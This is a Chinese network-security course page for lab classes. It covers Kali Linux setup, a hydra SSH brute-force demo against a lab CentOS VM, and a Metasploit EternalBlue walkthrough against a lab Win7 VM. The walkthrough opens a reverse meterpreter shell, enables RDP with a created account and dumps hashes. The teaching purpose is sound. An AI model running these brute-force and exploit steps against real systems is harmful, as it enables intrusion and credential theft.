目录

  • 1 §1 项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
      • 1.1.1 sqli-labs
        • 1.1.1.1 sqli-labs/Less-11
        • 1.1.1.2 思考
      • 1.1.2 ●项目一 cake
      • 1.1.3 DVWA
        • 1.1.3.1 ■■■dvwa(Windows)靶机渗透测试
      • 1.1.4 ●loginPHP
      • 1.1.5 CMS
      • 1.1.6 OWASP_Broken_Web_Apps
      • 1.1.7 项目二 pikachu
      • 1.1.8 redtiger
      • 1.1.9 DC-3
      • 1.1.10 ●项目三 GET, POST, 靶场夺旗
      • 1.1.11 ■SQL注入小结
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)sqli-labs
      • 1.2.2 (2)DVWA-master
        • 1.2.2.1 参考资料:在CentOS6.5中安装DVWA
        • 1.2.2.2 ■附 安装DVWA-1.9(完整版)
      • 1.2.3 (3)login, loginPHP
      • 1.2.4 (4)Firefox, Hackbar
      • 1.2.5 (5)sqlmap
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 sqlmap
    • 1.4 ●§1.3 Kali
      • 1.4.1 ●Kali2024.3-vmware
      • 1.4.2 ●Kali中安装Sublime(Python开发环境))
      • 1.4.3 ●●●作业1 “永恒之蓝”漏洞(2024.11.29)
        • 1.4.3.1 【Windows版本和内部版本号】
        • 1.4.3.2 参考资料:内网信息搜集
      • 1.4.4 ●Kali:用docker快速搭建漏洞靶场dvwa
    • 1.5 §1.4 Python
      • 1.5.1 §1.4.1 下载、安装、配置Python的Anaconda3集成开发环境
      • 1.5.2 §1.4.2 使用Jupyter Notebook
      • 1.5.3 §1.4.3 在Kali中安装Anaconda3
      • 1.5.4 §1.4.4 在CentOS7中安装Anaconda3
      • 1.5.5 §1.4.5 在CentOS7中安装PyCharm
      • 1.5.6 §1.4.5 在Windows中安装Sublime
    • 1.6 ●●●§1.5 Burp
      • 1.6.1 Burp安装步骤
      • 1.6.2 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.6.3 Q&A-2(作业批改、辅导答疑)
    • 1.7 §1.5 Wireshark
    • 1.8 ●●●2022.09.15腾讯会议答疑
    • 1.9 2022.09.22直播作业辅导
    • 1.10 第4周 SQL注入、Burp、Python
      • 1.10.1 (1)在Win7中安装Anaconda3集成开发环境
      • 1.10.2 【课外拓展】在Kali中安装Anaconda3
      • 1.10.3 (2)在Win7中安装Sublime
      • 1.10.4 (3作业5“SQL注入、Burp、Python”
      • 1.10.5 (4)SQLmap
      • 1.10.6 ●(5)课堂作业“cake”
      • 1.10.7 ※(6)SQL注入小结
      • 1.10.8 技能大赛样题
      • 1.10.9 第4周讲课提纲
  • 2 ■实训1 SQL注入(第6周)
    • 2.1 (1)实训任务
      • 2.1.1 Windows版本
    • 2.2 (2)实训步骤
    • 2.3 附件:课程资料(PPT,回放)
  • 3 §2 项目2 Kali和BT5
    • 3.1 §2.1 Kali的安装和配置
    • 3.2 §2.2 Kali的远程SSH登录
    • 3.3 §2.3 BT5的安装和配置及远程SSH登录
    • 3.4 2022.10.20作业6"Kali和BT5"
    • 3.5 §2.4 远程登录和远程桌面
    • 3.6 项目3 Kali中Wireshark抓取Telnet、HTTP明文传输
    • 3.7 ●●●§2.5 导入HTTP(CTF01.GET参数注入)
    • 3.8 测验1 (占期末总评成绩10%)
    • 3.9 GET
    • 3.10 ●§2.5 导入HTTP(CTF02.POST)
      • 3.10.1 2022.11.10靶场
      • 3.10.2 2022.11.17cookie注入
    • 3.11 【选学】§2.5 导入HTTP(CTF03.靶场夺旗)
    • 3.12 项目4 HTTP协议分析
    • 3.13 【课外视野】学习通账号信息泄露分析与安全防御措施
  • 4 ■实训2 网络协议漏洞与利用(第11周)
    • 4.1 实训任务(GNS3)
    • 4.2 ●●●网络协议分析
    • 4.3 ●●●测验2 网络协议分析
    • 4.4 ※※※EVE
      • 4.4.1 (1)实1-310物理机配置
      • 4.4.2 (2)虚拟机Win10配置
      • 4.4.3 (3)实训2 网络协议漏洞与利用
    • 4.5 HTTP Headers
  • 5 实训3 ARP、DHCP、DNS协议安全攻防
    • 5.1 ※※※第13周 ARP协议安全攻防
    • 5.2 (1)ARP协议安全攻防(试题)
    • 5.3 (2)ARP协议安全攻防
    • 5.4 (3)实战 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.5 (4)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.6 ※※※(5)DHCP欺骗、IP欺骗、ARP欺骗的防御
      • 5.6.1 【课外视野】OSPF、生成树、DHCP欺骗和ARP欺骗
    • 5.7 ※※※(6)DNS欺骗
    • 5.8 (7)Port Stealing
    • 5.9 测验3 ARP协议安全攻防
    • 5.10 (参考1 桥接模式)ARP协议安全攻防
    • 5.11 ※(参考2 EVE模拟)ARP协议安全攻防
    • 5.12 第14周末答疑
  • 6 实训4 密码口令渗透
    • 6.1 §4.3 Windows系统口令破解
    • 6.2 §4.4 Linux系统口令破解
    • 6.3 §4.6 无线口令破解
    • 6.4 ※§4.5 网站登录口令破解
    • 6.5 ●●●专题——显错注入+盲注
    • 6.6 ※第15周复习考试
  • 7 §9 实训项目9 暴力破解
    • 7.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 7.2 (2)字典工具pydictor.py
    • 7.3 (3)hydra和xhydra
    • 7.4 (4)Medusa
    • 7.5 (5)离线破解md5值和shadow加密文件
    • 7.6 (6)Brute Force(DVWA)
    • 7.7 (7)Burp Suite(Windows)
    • 7.8 (8)Burp Suite(Kali)
  • 8 §3 项目3 安装和配置Kali渗透测试系统
    • 8.1 (1)安装Kali渗透测试系统
    • 8.2 (2)SSH连接Kali
    • 8.3 (3)※ettercap抓取FTP登录账号和密码
    • 8.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 9 §5 项目2.3 安装Kali渗透测试系统
    • 9.1 BT到Kali的发展史
    • 9.2 (1)安装Kali
    • 9.3 (2)安装BT5
    • 9.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 10 §4 项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 10.1 (1)获取Win7系统shell、开启远程桌面
    • 10.2 (2)截图
    • 10.3 (3)Metasploit渗透测试
    • 10.4 (4)使用msf渗透攻击XP并进行远程关机
    • 10.5 (5)使用msf攻击Win10
    • 10.6 (6)附件:Windows版本
  • 11 ※§3 项目1.2 SQL注入
    • 11.1 ■(1)SQL注入联合查询(第3次课)
      • 11.1.1 附件:联合查询SQL注入模板
      • 11.1.2 ■联合查询SQL注入模板(简版)
    • 11.2 (2)SQL注入(PDF文档)
      • 11.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 11.2.2 ②部署sqli-labs学习环境
      • 11.2.3 ③)sqli-labs使用教学
      • 11.2.4 ④实战:SQL注入联合查询-获取数据库数据
    • 11.3 ■(3)部署loginPHP网站
      • 11.3.1 ●SQL注入测试
      • 11.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 11.3.3 ①login.php
      • 11.3.4 ②loginAuth.php
      • 11.3.5 ③loginAuth1.php
      • 11.3.6 ④success.php
      • 11.3.7 ⑤failure.php
      • 11.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 11.4 (4)DVWA-Low-SQL Injection
    • 11.5 (5)猫舍靶场联合查询SQL注入
    • 11.6 (6)Access数据库
    • 11.7 (7)MySQL数据库的远程登录
  • 12 §3 项目1.3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 12.1 (1)安装SQLmap
    • 12.2 (2)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 12.3 (3)结果截图(SQLmap拖库)
    • 12.4 (4)使用BurpSuite进行POST方式的SQL注入
  • 13 §2 项目1.4 防止黑客攻破Discuz论坛并拿下数据库
    • 13.1 ●实训5 防止黑客攻破Discuz论坛并拿下数据库
    • 13.2 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 13.3 (2)CentOS6.5-desktop及MySQL
  • 14 §8 项目2.4 作业 Wireshark抓取Telnet明文包
    • 14.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 14.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 14.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 15 ●●●§11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 15.1 ●文件上传(PDF文档)
    • 15.2 (1)基于文件上传漏洞获得网站shell权限
    • 15.3 (2)本地文件包含漏洞截图
    • 15.4 (3)课程资料
    • 15.5 (4)课外拓展 编辑器KindEditor文件上传漏洞
  • 16 §12 实训项目12 Nmap
    • 16.1 (1)安全工具
    • 16.2 (2)Nmap
    • 16.3 (3)网络空间安全(系统渗透测试篇)
    • 16.4 (4)信息收集
  • 17 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 17.1 (1)本地文件包含
    • 17.2 (2)远程文件包含
  • 18 §14 实训项目14 XSS跨站脚本攻击
    • 18.1 (1)窃取用户Cookie信息保存到远程服务器
    • 18.2 (2)反射型XSS攻击劫持用户浏览器
    • 18.3 (3)存储型XSS窃取用户信息
  • 19 DDoS
    • 19.1 (1)DDoS攻击原理
  • 20 §15 实训项目15 缓冲区溢出漏洞
  • 21 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 22 §15 网络协议分析
    • 22.1 (1)HTTP协议
    • 22.2 (2)Burp
    • 22.3 (3)Wireshark
    • 22.4 (4)Fiddler
  • 23 考核
    • 23.1 平时成绩(40%+30%)
    • 23.2 期末考试(30%)
  • 24 网络1901-04期末考试(2020-2021-2)
    • 24.1 试题1:damicms
    • 24.2 试题2:sqli-labs
    • 24.3 试题3:dvwa
    • 24.4 试题4:loginPHP
  • 25 校外卷重修-B05123网络安全运行与维护(2023年春)复习
    • 25.1 (1)loginPHP
    • 25.2 (2)实战-Web安全之SQL注入
    • 25.3 (2)Python编程
    • 25.4 (3)SQLmap或Python编程
  • 26 ●●●复习考试(2024年秋)
    • 26.1 复习
    • 26.2 模拟考试
    • 26.3 考试
●§1.3 Kali

§1.3 Kali

网络2101-02班——

(5)2022.09.21第1-2节课电脑学习通“直播”回放:

网络2103班——

(5)2022.09.21第3-4节课电脑学习通“直播”回放:




【导入】

破解Linux(CentOS7.8(192.168.112.100))的SSH登录密码:

# hydra -l root -P cd.txt -t 1 -vV -e ns 192.168.112.100 ssh

# 其中cd.txt为当前家目录下的字典,Linux为CentOS7.8(192.168.112.100)

得到root用户的密码为:123456

【课外拓展】

解决办法:使用fail2ban防止sshd服务被暴力破解 

http://www.fail2ban.org/wiki/index.php/Downloads

美杜莎破解:



【Kali简介】


Kali-Linux和Ubuntu都属于debian系列


1.Kali版本

1.0→2.0→2019.2→2019.4→2020.4→2021.1→2022.3Kali2024.3

                 vmware 桌面xfce               vmware  2022.08.08  2024.08.19

Ubuntu乌班图   Debian /ˈdɛ.bi.ən/ 

如果是vmware版,不用下载、安装,直接打开启动!


BT(Back Track)到Kali的发展史:

BT5,BT5R3,Kali2.0,Kali2019.2,Kali2019.4,Kali2021.1,Kali2022.3Kali2024.3

2011  2012.8  2015


(1)kali-2021.1-vmware(已配置)

下载、打开虚拟机“kali-2021.1-vmware(kali/kali,192.168.112.200)”:

链接:https://pan.baidu.com/s/1d1gmZ-BLBT02NQlCQVDO-A?pwd=lch1

下载目录“VM/kali-2021.1-vmware”到D:\VM

在VMware中打开kali-linux-2021.1-vmware-amd64.vmx

(2)kali-linux-2024.3-vmware-amd64.7z(3.1GB)

官网:

https://www.kali.org/

北京外国语大学开源软件镜像站

https://mirrors.bfsu.edu.cn/kali-images/kali-2024.3/

清华大学开源软件镜像站

https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2024.3/kali-linux-2024.3-vmware-amd64.7z

kali-linux-2024.3-vmware-amd64.7z(3.1 GiB 2024-08-19 07:04)

解压

打开:D:\VM\kali-linux-2024.3-vmware\kali-linux-2024.3-vmware-amd64.vmx

虚拟机硬件设置:4核/4GB/80GB/NAT

开启:已复制

用户名/密码:kali/kali


3.安装

Linux版本:Debian 10.x 64位

虚拟机名称:Kali2024.3(192.168.112.200)

位置:D:\VM\Kali2024.3(192.168.112.200)

最大磁盘大小:80G

主机名:kali

用户:wl23/123456

写入磁盘:是

1924个文件

/dev/sda


4.启动

kali/kali


右击桌面,open terminal here

┌──(kali㉿kali)-[~]

└─$

Ctrl+Alt+F1~F6   打开Kali终端快捷键

Ctrl+Alt+F7         返回GUI界面快捷键

Ctrl+Alt+T           打开终端快捷键


$ uname -a

Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64 GNU/Linux

$ lsb_release -a

No LSB modules are available.

Distributor ID: Kali

Description: Kali GNU/Linux Rolling

Release: 2024.3

Codename: kali-rolling

$ cat /proc/version

Linux version 6.8.11-amd64 (devel@kali.org) (x86_64-linux-gnu-gcc-13 (Debian 13.2.0-25) 13.2.0, GNU ld (GNU Binutils for Debian) 2.42) #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30)




# cat /etc/os-release

PRETTY_NAME="Kali GNU/Linux Rolling"

NAME="Kali GNU/Linux"

VERSION_ID="2024.4"

VERSION="2024.4"

VERSION_CODENAME=kali-rolling

ID=kali

ID_LIKE=debian

HOME_URL="https://www.kali.org/"

SUPPORT_URL="https://forums.kali.org/"

BUG_REPORT_URL="https://bugs.kali.org/"

ANSI_COLOR="1;31"


5.汉化

$ sudo dpkg-reconfigure locales

  zh_CN.UTF-8  UTF-8(倒数第5个) 空格 Tab  zh_CN.UTF-8

  Restart重启Kali


6.终端切换root用户

┌──(kali㉿kali)-[~]

└─$ sudo su -

输入kali用户的密码:kali

┌──(root㉿kali)-[~]

└─# 


7.虚拟机kali-2024.3的网络配置

(1)网卡:IP,掩码,网关

# vim /etc/network/interfaces  # 配置网卡

auto eth0 

iface eth0 inet static

address 192.168.112.200

netmask 255.255.255.0

gateway 192.168.112.2

(2)DNS

# vim /etc/resolv.conf      # 配置DNS


# Generated by NetworkManager 

#search localdomain 

nameserver 192.168.112.2

(3)重启网卡,测试

#  systemctl restart networking   # 重启网卡

# ip a&&ip a     # 显示IP和网关:192.168.112.200/24,192.168.112.2

# ping www.baidu.com    #通!


8.apt源

# vim /etc/apt/sources.list 

#阿里云

deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#北京外国语大学

deb http://mirrors.bfsu.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.bfsu.edu.cn/kali kali-rolling main non-free contrib

#清华大学

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free


# apt-get update && apt-get upgrade && apt-get clean 

# apt-get install ibus ibus-pinyin  #安装中文输入法Google拼音,<Ctrl>+空格或Ctrl+Shift切换英文输入方法   或中文输入法fcitx fcitx-pinyin

# apt-get install ufw    #安装防火墙

# ufw status                 #查看防火墙的状态  Status: inactive


xfce切换到GNOME:

# apt-get update    # 更新APT源

# apt-get remove kali-themes

# apt install kali-desktop-gnome   # 安装GNOME,设置显示管理器gdm3

# reboot


解决中文“麻将问题”(Kali2019.4后):

# dpkg-reconfigure locales

  zh_CN.UTF-8  UTF-8

# apt-get install xfonts-intl-chinese

# apt-get install ttf-wqy-microhei ttf-wqy-zenhei

# echo LANG="zh_CN.UTF-8" > /etc/default/locale


9.Linux基础    RedHat认证:RHCSA RHCE RHCA

(1)网络配置

   # vi /etc/sysconfig/network-scripts/ifcfg-ens33    # CentOS7配置网卡

   # vim /etc/network/interfaces    # Debian配置网卡

(2)yum源,apt源

   # vi /etc/yum.repos.d/CentOS7.repo    # CentOS7配置网络yum源

   # vim /etc/apt/sources.list    # Debian配置网络apt源

(3)vi/vim编辑器

                命令模式:查找/ , n;删除行dd;复制行yy,粘贴行p;撤销u;iIaAoO

                /          \

  i或<Ins>/<Esc>     :\<Esc>

            /                  \

    编辑模式         末行模式

  (-- 插入 --)         :wq   :q!    :set nu   :n

  (-- 改写 --)

<Esc>:任何模式切换到命令模式

a,A,i,I,o,O,<Ins>:从命令模式切换到编辑模式的命令

::从命令模式切换到末行模式的命令

(4)常用的基本命令:文件,目录

cd          #回到家目录或进入指定目录 cd /etc/network/

pwd        #显示当前目录名

ls            #显示当前目录    ll

clear      #清屏

date       #日期

cal          #日历

ip a         #显示ip地址        ifconfig,route -n ,cat /etc/resolv.conf(或nslookup)

ping        #连通性测试

whoami   #显示当前用户    w

history   #显示历史命令    # !<序号>  执行历史上的<序号>对应的命令

init 6      #重启

init 0      #关机

基本命令:

init 0|6|3|5、history、clear、date、cal、uptime、uname、echo、hostname、tty、whoami、id、su、logname、ps、runlevel

网络命令(10个):

ip a、ifconfig、ping、arp、route、traceroute、netstat -antup、nslookup、net、hostname

常用命令(23个):

date、cal、uptime、history、clear

pwd、ls、cd、tree、mkdir、rmdir、touch、rm、cp、mv

echo、cat、more、less、head、tail、grep、wc

磁盘管理命令:

fdisk、mkfs.xfs、mount、mdadm

(5)服务的搭建:Web(Apache/Nginx),DNS,FTP,DHCP,Samba,MySQLPHP,Telnet/SSH/VNC/RDP

(6)软件源码的安装

(7)PythonGCC、Java环境

(8)磁盘管理:磁盘分区,独立磁盘冗余阵列(RAID5,RAID10),磁盘配额,LVM


10.使用

(1)Apache2

# systemctl status apache2

# /etc/init.d/apache2 status

# systemctl enable apache2&&systemctl start apache2

# cd /var/www/html

# ll

物理机Firefox浏览器测试:http://192.168.112.200


03 - Web程序

(1)burpsuite:Community Edition 2021.2.1→2024.5.5

# burpsuite


09 - 嗅探/欺骗

(2)wireshark:4.2.5

# wireshark




(3)ettercap:0.8.3.1

# ettercap -G



08 - 漏洞利用工具集

(4)metasploit:6.0.40-dev  6.4.18-dev

# msfconsole





其它

(1)nmap

# nmap 192.168.112.101     #扫描Win7

PORT      STATE SERVICE

445/tcp   open  microsoft-ds

# nmap 192.168.112.100     #扫描CentOS7.8

# nmap -sV 192.168.112.100 -p T:80    #获取Apache、PHP版本

PORT   STATE SERVICE VERSION

80/tcp open      http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)

(2)Python&Python2

3.12.7,2.7.18



(3)Java

jdk11→jdk23-ea


(4)无线





【实战】操作

10.实战——使用永恒之蓝漏洞获取Win7系统shell及远程桌面

漏洞利用,可攻击Win7、Win Server 200R2、WinXP

参见学习通的章节10.1:

https://mooc1-2.chaoxing.com/mycourse/teacherstudy?chapterId=176607313&courseId=205573442&clazzid=59697986

(1)# systemctl start postgresql       #开启数据库

    # systemctl enable postgresql   #开机自启数据库

    # systemctl enable postgresql --now  #启动并开机自启数据库

(2)# msfdb init                    #初始化msf数据库

(3)# msfconsole                  #开启MSF

①扫描

msf6 > search ms17_010

msf6 > use auxiliary/scanner/smb/smb_ms17_010   #或 use 0

msf6 auxiliary(scanner/smb/smb_ms17_010)> set RHOSTS 192.168.112.101

msf6 auxiliary(scanner/smb/smb_ms17_010)> exploit


[+] 192.168.112.101:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.112.101:445   - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

②攻击

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue   #或 use 0

eternal[ɪˈtɜːnl] adj. 永恒的     exploit[ɪkˈsplɔɪt] vt. 利用

msf6 exploit(windows/smb/ms17_010_eternalblue)> show options

msf6 exploit(windows/smb/ms17_010_eternalblue)> set RHOSTS 192.168.112.101

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.112.200

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Meterpreter session 1 opened (192.168.112.200:4444 -> 192.168.112.101:49265) at 2022-09-12 15:44:23 -0400

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

③后渗透工具meterpreter

查看权限:

meterpreter >getuid

meterpreter >sysinfo


④获取Win7系统shell

meterpreter> shell


乱码:

Win7解决方案:

C:\Windows\system32>chcp 65001

XP解决方案:

C:\Windows\system32>chcp 437

⑤Win7系统远程桌面

启用远程桌面(加载RDP协议)

meterpreter> run post/windows/manage/enable_rdp

创建一个新用户来远程连接Win7桌面

meterpreter> run post/windows/manage/enable_rdp USERNAME=lch PASSWORD=123456



在Kali系统上,按下Ctrl+Shift+T新建终端窗口,或点击终端按钮开启一个终端:root@kali:~# rdesktop 192.168.112.101



解决办法:

用户不应是root,而应该是普通用户!

目标机器是否开启了远程桌面服务?

Kali中/etc/ssh/sshd_config文件,X11 forwarding 是否设置为yes?

Kali默认安装的rdesktop容易出现问题,卸载,重装:apt-get remove/install rdesktop两条命令即可



后渗透工具:hashdump,upload,execute -f notepad.exe,screenshot,background












[*] exec: rdesktop 192.168.112.101

UI(error): ui_init(), failed to open X11 display:

新建Kali窗口:

$ rdesktop 192.168.112.101



扫描、攻击靶机主要步骤:

auxiliary扫描

1.扫描靶机

  msf6 > use auxiliary/scanner/smb/smb_ms17_010

             auxiliary/功能       /服务/名称

  options 

  设置目标地址:set RHOSTS 192.168.112.101

  设置目标端口:set RPORT  445

2.扫描

  run/exploit

●exploit攻击

3.攻击靶机

  use exploit/windows/smb/ms17_010_eternalblue

      exploit/操作系统/服务/名称

  options

  设置目标地址:set RHOSTS 192.168.112.101

  设置目标端口:set RPORT  445

payload

4.选择payload

  set payload windows/x64/meterpreter/reverse_tcp

            payload 操作系统/类型/名称

  options

  设置本地地址:set LHOST  192.168.112.200

5.攻击

  run/exploit

 

Step 1扫描靶机

msf6 >useauxiliary/scanner/smb/smb_ms17_010

Required栏为yes,则CurrentSetting栏内的值需要进行设置

[+]表示有此漏洞

 

Step 2选择exploit

msf6 auxiliary(scanner/smb/smb_ms17_010) > useexploit/windows/smb/ms17_010_eternalblue

option 显示选项,通常在exploit模块中,我们需要设置靶机的地址,即RHOST

 

Step 3 exploit(实战拿shell)

 

 

meterpreter(后渗透工具meterpreter):

查看用户权限: meterpreter>getuid

获取hash密码:meterpreter> hashdump

上传文件: meterpreter>upload

执行文件: meterpreter>execute -f  notepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

MSF基础命令:

help/?               帮助菜单

exit|quit     退出MSF控制台

history

sessions        会话

set                 设置选项

unset             取消设置的选项

模块命令:

back               返回上一级

info                显示一个或者多个模块的信息

options

search

show                   显示所给类型的模块

use                 使用所选择的模块

 

background   将当前操作在后台运行

session        会话

 

db_connect    连接数据库

db_nmap        扫描目的服务器端口



MSF简介:

MSF—The Metasploit Framework

漏洞框架,综合渗透测试框架,漏洞攻击

从漏洞发现,掌握渗透测试常用工具。

MSF漏洞利用方向,学会MSF使用方法。学会从漏洞利用提权再到免杀全流程。

1.metasploit框架介绍

2.metasploit模块介绍

3.常用基础指令

4.msf攻击流程

5.后渗透工具meterpreter

 

综合渗透测试框架:

auxiliary        辅助模块              信息搜集

exploit          攻击模块               利用发现的安全漏洞或配置弱点对远程目标系统进行攻击

payload        攻击载荷模块        攻击成功后促使靶机运行的一段植入代码

post              后渗透攻击模块    收集更多信息或进一步访问被利用的目标系统

encoders       编码模块              将攻击载荷进行编码,来绕过防护软件拦截